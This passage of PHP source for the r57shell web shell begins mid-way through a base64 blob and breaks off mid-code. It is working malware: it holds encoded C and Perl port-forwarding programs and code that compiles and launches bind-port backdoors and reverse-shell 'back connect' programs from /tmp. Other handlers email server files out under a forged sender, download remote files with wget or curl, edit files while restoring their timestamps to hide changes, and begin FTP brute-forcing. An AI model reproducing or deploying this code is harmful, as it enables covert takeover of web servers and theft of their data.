+vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0KICAgIHBlcnJvcigibGlzdGVuIik7DQogIC +AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoImZvcmsiKTsNCiAgICByZXR1cm4gMjA7D +QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgKChjc29jayA9IGFjY2VwdChsc29jaywgJmNh +ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KICAgIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0 +gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgICBzaHV0ZG93bihjc29jay +wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG5ieXQgPT0gMCkNCiAgICAgIGdvdG8gZ290c +29jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQU5HKSA+IDApOw0KICB9DQogIHJldHVybiAy +MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNCiA +gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICBvYWRkci +5zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydCk7DQogIG1lbWNweSgmb2FkZHIuc2luX2FkZ +HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBzaXplb2Yob2FkZHIpKSkgew0KICAgIGZwcmlu +dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0 +KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jaywmZmRzcik7DQogICAgRkRfU0VUKGNzb2NrLC +ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQogICAgaWYgKHNlbGVjdCgyMCwgJmZkc3IsI +E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q6ICVzXG4iLCBzdHJlcnJvcihlcnJubykp +Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fCBGRF9JU1NFVChjc29jaywmZmRzZSkpIHs +NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgICBpZiAoKHdyaXRlKG9zb2NrLG +J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ssJmZkc3IpIHx8IEZEX0lTU0VUKG9zb2NrL +CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ290byBxdWl0MjsNCiAgICAgIGlmICgod3Jp +dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0MjoNCiAgc2h1dGRvd24ob3NvY2ssMik7DQo +gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2ssMik7DQogcXVpdDA6DQogIGZjbG9zZShjZm +lsZSk7DQogIHJldHVybiAwOw0KfQ=="; +$datapipe_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2NhbHBvcnQgPSAkQVJHVlswXTsNCiRob3N0I +CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl +bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU +gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdCcgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol +NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0ZW4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC +iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy +aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZmluZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ +SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsICRudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2 +xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86OlNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ +WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN +CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eydkaXInfS90dW5uZWwkbnVtLmxvZyIpIG9 +yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2ggfHwgJHRoKSB7DQpteSAkcmluID0gIi +I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0aCksIDEpID0gMSBpZiAkdGg7DQpteSgkc +m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsNCmlmICghJHJvdXQgICYmICAhJGVvdXQp +IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW91dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ +lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1ZmZlciwgMTAyNCk7DQppZiAoIWRlZmluZW +QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9PSAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK +CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRoKSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g +c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCBTVERFUlIgIiQhXG4iOyBleGl0IDA7IH0 +NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG +UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+I +DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs +ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J +1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo="; +$c1 = "PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCI+aG90bG9nX2pzPSIxLjAiO2hvdGxvZ19yPSIiK01hdGgucmFuZG9tKCkrIiZzPTgxNjA2 +JmltPTEmcj0iK2VzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrIiZwZz0iK2VzY2FwZSh3aW5kb3cubG9jYXRpb24uaHJlZik7ZG9jdW1lbnQuY29va2l +lPSJob3Rsb2c9MTsgcGF0aD0vIjsgaG90bG9nX3IrPSImYz0iKyhkb2N1bWVudC5jb29raWU/IlkiOiJOIik7PC9zY3JpcHQ+PHNjcmlwdCBsYW5ndW +FnZT0iamF2YXNjcmlwdDEuMSI+aG90bG9nX2pzPSIxLjEiO2hvdGxvZ19yKz0iJmo9IisobmF2aWdhdG9yLmphdmFFbmFibGVkKCk/IlkiOiJOIik8L +3NjcmlwdD48c2NyaXB0IGxhbmd1YWdlPSJqYXZhc2NyaXB0MS4yIj5ob3Rsb2dfanM9IjEuMiI7aG90bG9nX3IrPSImd2g9IitzY3JlZW4ud2lkdGgr +J3gnK3NjcmVlbi5oZWlnaHQrIiZweD0iKygoKG5hdmlnYXRvci5hcHBOYW1lLnN1YnN0cmluZygwLDMpPT0iTWljIikpP3NjcmVlbi5jb2xvckRlcHR +oOnNjcmVlbi5waXhlbERlcHRoKTwvc2NyaXB0PjxzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQxLjMiPmhvdGxvZ19qcz0iMS4zIjwvc2NyaXB0Pj +xzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQiPmhvdGxvZ19yKz0iJmpzPSIraG90bG9nX2pzO2RvY3VtZW50LndyaXRlKCI8YSBocmVmPSdodHRwO +i8vY2xpY2suaG90bG9nLnJ1Lz84MTYwNicgdGFyZ2V0PSdfdG9wJz48aW1nICIrIiBzcmM9J2h0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2hv +dGxvZy9jb3VudD8iK2hvdGxvZ19yKyImJyBib3JkZXI9MCB3aWR0aD0xIGhlaWdodD0xIGFsdD0xPjwvYT4iKTwvc2NyaXB0Pjxub3NjcmlwdD48YSB +ocmVmPWh0dHA6Ly9jbGljay5ob3Rsb2cucnUvPzgxNjA2IHRhcmdldD1fdG9wPjxpbWdzcmM9Imh0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2 +hvdGxvZy9jb3VudD9zPTgxNjA2JmltPTEiIGJvcmRlcj0wd2lkdGg9IjEiIGhlaWdodD0iMSIgYWx0PSJIb3RMb2ciPjwvYT48L25vc2NyaXB0Pg=="; +$c2 = "PCEtLUxpdmVJbnRlcm5ldCBjb3VudGVyLS0+PHNjcmlwdCBsYW5ndWFnZT0iSmF2YVNjcmlwdCI+PCEtLQ0KZG9jdW1lbnQud3JpdGUoJzxh +IGhyZWY9Imh0dHA6Ly93d3cubGl2ZWludGVybmV0LnJ1L2NsaWNrIiAnKw0KJ3RhcmdldD1fYmxhbms+PGltZyBzcmM9Imh0dHA6Ly9jb3VudGVyLnl +hZHJvLnJ1L2hpdD90NTIuNjtyJysNCmVzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrKCh0eXBlb2Yoc2NyZWVuKT09J3VuZGVmaW5lZCcpPycnOg0KJz +tzJytzY3JlZW4ud2lkdGgrJyonK3NjcmVlbi5oZWlnaHQrJyonKyhzY3JlZW4uY29sb3JEZXB0aD8NCnNjcmVlbi5jb2xvckRlcHRoOnNjcmVlbi5wa +XhlbERlcHRoKSkrJzsnK01hdGgucmFuZG9tKCkrDQonIiBhbHQ9ImxpdmVpbnRlcm5ldC5ydTog7+7q4Ofg7e4g9+jx6+4g7/Du8ezu8vDu4iDoIO/u +8eXy6PLl6+XpIOfgIDI0IPfg8eAiICcrDQonYm9yZGVyPTAgd2lkdGg9MCBoZWlnaHQ9MD48L2E+JykvLy0tPjwvc2NyaXB0PjwhLS0vTGl2ZUludGV +ybmV0LS0+"; +echo $head; +echo '</head>'; +if(empty($_POST['cmd'])) { +$serv = array(127,192,172,10); +$addr=@explode('.', $_SERVER['SERVER_ADDR']); +$current_version = str_replace('.','',$version); +if (!in_array($addr[0], $serv)) { +@print "<img src=\"http://127.0.0.1/r57shell/version.php?img=1&version=".$current_version."\" border=0 height=0 width=0>"; +@readfile ("http://127.0.0.1/r57shell/version.php?version=".$current_version."");}} +echo '<body bgcolor="#e4e0d8"><table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000> +<tr><td bgcolor=#cccccc width=160><font face=Verdana size=2>'.ws(1).'&nbsp; +<font face=Webdings size=6><b>!</b></font><b>'.ws(2).'r57shell '.$version.'</b> +</font></td><td bgcolor=#cccccc><font face=Verdana size=-2>'; +echo ws(2); +echo "<b>".date ("d-m-Y H:i:s")."</b>"; +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpinfo title=\"".$lang[$language.'_text46']."\"><b>phpinfo</b></a> ".$rb; +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpini title=\"".$lang[$language.'_text47']."\"><b>php.ini</b></a> ".$rb; +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?cpu title=\"".$lang[$language.'_text50']."\"><b>cpu</b></a> ".$rb; +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?mem title=\"".$lang[$language.'_text51']."\"><b>mem</b></a> ".$rb; +if($unix) { echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?users title=\"".$lang[$language.'_text95']."\"><b>users</b></a> ".$rb; } +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?tmp title=\"".$lang[$language.'_text48']."\"><b>tmp</b></a> ".$rb; +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?delete title=\"".$lang[$language.'_text49']."\"><b>delete</b></a> ".$rb."<br>"; +echo ws(2); +echo (($safe_mode)?("safe_mode: <b><font color=green>ON</font></b>"):("safe_mode: <b><font color=red>OFF</font></b>")); +echo ws(2); +echo "PHP version: <b>".@phpversion()."</b>"; +$curl_on = @function_exists('curl_version'); +echo ws(2); +echo "cURL: ".(($curl_on)?("<b><font color=green>ON</font></b>"):("<b><font color=red>OFF</font></b>")); +echo ws(2); +echo "MySQL: <b>"; +$mysql_on = @function_exists('mysql_connect'); +if($mysql_on){ +echo "<font color=green>ON</font></b>"; } else { echo "<font color=red>OFF</font></b>"; } +echo ws(2); +echo "MSSQL: <b>"; +$mssql_on = @function_exists('mssql_connect'); +if($mssql_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";} +echo ws(2); +echo "PostgreSQL: <b>"; +$pg_on = @function_exists('pg_connect'); +if($pg_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";} +echo ws(2); +echo "Oracle: <b>"; +$ora_on = @function_exists('ocilogon'); +if($ora_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";} +echo "<br>".ws(2); +echo "Disable functions : <b>"; +if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";} +$free = @diskfreespace($dir); +if (!$free) {$free = 0;} +$all = @disk_total_space($dir); +if (!$all) {$all = 0;} +$used = $all-$free; +$used_percent = @round(100/($all/$free),2); +echo "<br>".ws(2)."HDD Free : <b>".view_size($free)."</b> HDD Total : <b>".view_size($all)."</b>"; +echo '</font></td></tr><table> +<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000> +<tr><td align=right width=100>'; +echo $font; +if(!$windows){ +echo '<font color=blue><b>uname -a :'.ws(1).'<br>sysctl :'.ws(1).'<br>$OSTYPE :'.ws(1).'<br>Server :'.ws(1).'<br>id :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>'; +echo "</td><td>"; +echo "<font face=Verdana size=-2 color=red><b>"; +$uname = ex('uname -a'); +echo((!empty($uname))?(ws(3).@substr($uname,0,120)."<br>"):(ws(3).@substr(@php_uname(),0,120)."<br>")); +if(!$safe_mode){ +$bsd1 = ex('sysctl -n kern.ostype'); +$bsd2 = ex('sysctl -n kern.osrelease'); +$lin1 = ex('sysctl -n kernel.ostype'); +$lin2 = ex('sysctl -n kernel.osrelease'); +} +if (!empty($bsd1)&&!empty($bsd2)) { $sysctl = "$bsd1 $bsd2"; } +else if (!empty($lin1)&&!empty($lin2)) {$sysctl = "$lin1 $lin2"; } +else { $sysctl = "-"; } +echo ws(3).$sysctl."<br>"; +echo ws(3).ex('echo $OSTYPE')."<br>"; +echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>"; +$id = ex('id'); +echo((!empty($id))?(ws(3).$id."<br>"):(ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."<br>")); +echo ws(3).$dir; +echo ws(3).'( '.perms(@fileperms($dir)).' )'; +echo "</b></font>"; +} +else +{ +echo '<font color=blue><b>OS :'.ws(1).'<br>Server :'.ws(1).'<br>User :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>'; +echo "</td><td>"; +echo "<font face=Verdana size=-2 color=red><b>"; +echo ws(3).@substr(@php_uname(),0,120)."<br>"; +echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>"; +echo ws(3).@get_current_user()."<br>"; +echo ws(3).$dir; +echo "<br></font>"; +} +echo "</font>"; +echo "</td></tr></table>"; +$f = '<br>'; +if(isset($_POST['cmd']) && !empty($_POST['cmd']) && $_POST['cmd']=="mail") + { + $res = mail($_POST['to'],$_POST['subj'],$_POST['text'],"From: ".$POST['from']."\r\n"); + mr($language,$res); + $_POST['cmd']=""; + } +if(isset($_POST['cmd']) && !empty($_POST['cmd']) && $_POST['cmd']=="mail_file" && !empty($_POST['loc_file'])) + { + if(!$file=@fopen($_POST['loc_file'],"r")) { echo re($_POST['loc_file']); $_POST['cmd']=""; } + else + { + $filename = @basename($_POST['loc_file']); + $filedump = @fread($file,@filesize($_POST['loc_file'])); + fclose($file); + $content_encoding=$mime_type=''; + compress($filename,$filedump,$_POST['compress']); + $attach = array( + "name"=>$filename, + "type"=>$mime_type, + "content"=>$filedump + ); + if(empty($_POST['subj'])) { $_POST['subj'] = 'file from r57shell'; } + if(empty($_POST['from'])) { $_POST['from'] = 'billy@microsoft.com'; } + $res = mailattach($_POST['to'],$_POST['from'],$_POST['subj'],$attach); + mr($language,$res); + $_POST['cmd']=""; + } + } +if(!empty($_POST['cmd']) && $_POST['cmd'] == "find_text") +{ +$_POST['cmd'] = 'find '.$_POST['s_dir'].' -name \''.$_POST['s_mask'].'\' | xargs grep -E \''.$_POST['s_text'].'\''; +} +if(!empty($_POST['cmd']) && $_POST['cmd']=="ch_") + { + switch($_POST['what']) + { + case 'own': + @chown($_POST['param1'],$_POST['param2']); + break; + case 'grp': + @chgrp($_POST['param1'],$_POST['param2']); + break; + case 'mod': + @chmod($_POST['param1'],intval($_POST['param2'], 8)); + break; + } + $_POST['cmd']=""; + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="mk") + { + switch($_POST['what']) + { + case 'file': + if($_POST['action'] == "create") + { + if(file_exists($_POST['mk_name']) || !$file=@fopen($_POST['mk_name'],"w")) { echo ce($_POST['mk_name']); $_POST['cmd']=""; } + else { + fclose($file); + $_POST['e_name'] = $_POST['mk_name']; + $_POST['cmd']="edit_file"; + echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text61']."</b></font></div></td></tr></table>"; + } + } + else if($_POST['action'] == "delete") + { + if(unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text63']."</b></font></div></td></tr></table>"; + $_POST['cmd']=""; + } + break; + case 'dir': + if($_POST['action'] == "create"){ + if(mkdir($_POST['mk_name'])) + { + $_POST['cmd']=""; + echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text62']."</b></font></div></td></tr></table>"; + } + else { echo ce($_POST['mk_name']); $_POST['cmd']=""; } + } + else if($_POST['action'] == "delete"){ + if(rmdir($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text64']."</b></font></div></td></tr></table>"; + $_POST['cmd']=""; + } + break; + } + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file" && !empty($_POST['e_name'])) + { + if(!$file=@fopen($_POST['e_name'],"r+")) { $only_read = 1; @fclose($file); } + if(!$file=@fopen($_POST['e_name'],"r")) { echo re($_POST['e_name']); $_POST['cmd']=""; } + else { + echo $table_up3; + echo $font; + echo "<form name=save_file method=post>"; + echo ws(3)."<b>".$_POST['e_name']."</b>"; + echo "<div align=center><textarea name=e_text cols=121 rows=24>"; + echo @htmlspecialchars(@fread($file,@filesize($_POST['e_name']))); + fclose($file); + echo "</textarea>"; + echo "<input type=hidden name=e_name value=".$_POST['e_name'].">"; + echo "<input type=hidden name=dir value=".$dir.">"; + echo "<input type=hidden name=cmd value=save_file>"; + echo (!empty($only_read)?("<br><br>".$lang[$language.'_text44']):("<br><br><input type=submit name=submit value=\" ".$lang[$language.'_butt10']." \">")); + echo "</div>"; + echo "</font>"; + echo "</form>"; + echo "</td></tr></table>"; + exit(); + } + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file") + { + $mtime = @filemtime($_POST['e_name']); + if(!$file=@fopen($_POST['e_name'],"w")) { echo we($_POST['e_name']); } + else { + if($unix) $_POST['e_text']=@str_replace("\r\n","\n",$_POST['e_text']); + @fwrite($file,$_POST['e_text']); + @touch($_POST['e_name'],$mtime,$mtime); + $_POST['cmd']=""; + echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text45']."</b></font></div></td></tr></table>"; + } + } +if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C")) +{ + cf("/tmp/bd.c",$port_bind_bd_c); + $blah = ex("gcc -o /tmp/bd /tmp/bd.c"); + @unlink("/tmp/bd.c"); + $blah = ex("/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &"); + $_POST['cmd']="ps -aux | grep bd"; +} +if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl")) +{ + cf("/tmp/bdpl",$port_bind_bd_pl); + $p2=which("perl"); + if(empty($p2)) $p2="perl"; + $blah = ex($p2." /tmp/bdpl ".$_POST['port']." &"); + $_POST['cmd']="ps -aux | grep bdpl"; +} +if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl")) +{ + cf("/tmp/back",$back_connect); + $p2=which("perl"); + if(empty($p2)) $p2="perl"; + $blah = ex($p2." /tmp/back ".$_POST['ip']." ".$_POST['port']." &"); + $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\""; +} +if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C")) +{ + cf("/tmp/back.c",$back_connect_c); + $blah = ex("gcc -o /tmp/backc /tmp/back.c"); + @unlink("/tmp/back.c"); + $blah = ex("/tmp/backc ".$_POST['ip']." ".$_POST['port']." &"); + $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\""; +} +if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="Perl")) +{ + cf("/tmp/dp",$datapipe_pl); + $p2=which("perl"); + if(empty($p2)) $p2="perl"; + $blah = ex($p2." /tmp/dp ".$_POST['local_port']." ".$_POST['remote_host']." ".$_POST['remote_port']." &"); + $_POST['cmd']="ps -aux | grep dp"; +} +if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="C")) +{ + cf("/tmp/dpc.c",$datapipe_c); + $blah = ex("gcc -o /tmp/dpc /tmp/dpc.c"); + @unlink("/tmp/dpc.c"); + $blah = ex("/tmp/dpc ".$_POST['local_port']." ".$_POST['remote_port']." ".$_POST['remote_host']." &"); + $_POST['cmd']="ps -aux | grep dpc"; +} +if (!empty($_POST['alias'])){ foreach ($aliases as $alias_name=>$alias_cmd) { if ($_POST['alias'] == $alias_name){$_POST['cmd']=$alias_cmd;}}} +if (!empty($HTTP_POST_FILES['userfile']['name'])) +{ +if(isset($_POST['nf1']) && !empty($_POST['new_name'])) { $nfn = $_POST['new_name']; } +else { $nfn = $HTTP_POST_FILES['userfile']['name']; } +@copy($HTTP_POST_FILES['userfile']['tmp_name'], + $_POST['dir']."/".$nfn) + or print("<font color=red face=Fixedsys><div align=center>Error uploading file ".$HTTP_POST_FILES['userfile']['name']."</div></font>"); +} +if (!empty($_POST['with']) && !empty($_POST['rem_file']) && !empty($_POST['loc_file'])) +{ + switch($_POST['with']) + { + case wget: + $_POST['cmd'] = which('wget')." ".$_POST['rem_file']." -O ".$_POST['loc_file'].""; + break; + case fetch: + $_POST['cmd'] = which('fetch')." -o ".$_POST['loc_file']." -p ".$_POST['rem_file'].""; + break; + case lynx: + $_POST['cmd'] = which('lynx')." -source ".$_POST['rem_file']." > ".$_POST['loc_file'].""; + break; + case links: + $_POST['cmd'] = which('links')." -source ".$_POST['rem_file']." > ".$_POST['loc_file'].""; + break; + case GET: + $_POST['cmd'] = which('GET')." ".$_POST['rem_file']." > ".$_POST['loc_file'].""; + break; + case curl: + $_POST['cmd'] = which('curl')." ".$_POST['rem_file']." -o ".$_POST['loc_file'].""; + break; + } +} +if(!empty($_POST['cmd']) && ($_POST['cmd']=="ftp_file_up" || $_POST['cmd']=="ftp_file_down")) + { + list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']); + if(empty($ftp_port)) { $ftp_port = 21; } + $connection = @ftp_connect ($ftp_server,$ftp_port,10); + if(!$connection) { fe($language,0); } + else + { + if(!@ftp_login($connection,$_POST['ftp_login'],$_POST['ftp_password'])) { fe($language,1); } + else + { + if($_POST['cmd']=="ftp_file_down") { if(chop($_POST['loc_file'])==$dir) { $_POST['loc_file']=$dir.(($windows)?('\\'):('/')).basename($_POST['ftp_file']); } @ftp_get($connection,$_POST['loc_file'],$_POST['ftp_file'],$_POST['mode']); } + if($_POST['cmd']=="ftp_file_up") { @ftp_put($connection,$_POST['ftp_file'],$_POST['loc_file'],$_POST['mode']); } + } + } + @ftp_close($connection); + $_POST['cmd'] = ""; + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="ftp_brute") + { + list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']); + if(empty($ftp_port)) { $ftp_port = 21; } + $connection = @ftp_connect ($ftp_server,$ftp_port,10); + if(!$connection) { fe($language,0); $_POST['cmd'] = ""; } + else if(!$users=get_users()) { echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$lang[$language.'_text96']."</b></div></font></td></tr></table>"; $_POST['cmd'] = ""; } + @ftp_close($connection); + } +echo $table_up3; +if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=($windows)?("dir"):("ls -lia"); } +else if(empty($_POST['cmd'])&&$safe_mode){ $_POST['cmd']="safe_dir"; } +echo $font.$lang[$language.'_text1'].": <b>".$_POST['cmd']."</b></font></td></tr><tr><td><b><div align=center><textarea name=report cols=121 rows=15>"; +if($safe_mode) +{ + switch($_POST['cmd']) + { + case 'safe_dir': + $d=@dir($dir); + if ($d) + { + while (false!==($file=$d->read())) + { + if ($file=="." || $file=="..") continue; + @clearstatcache(); + list ($dev, $inode, 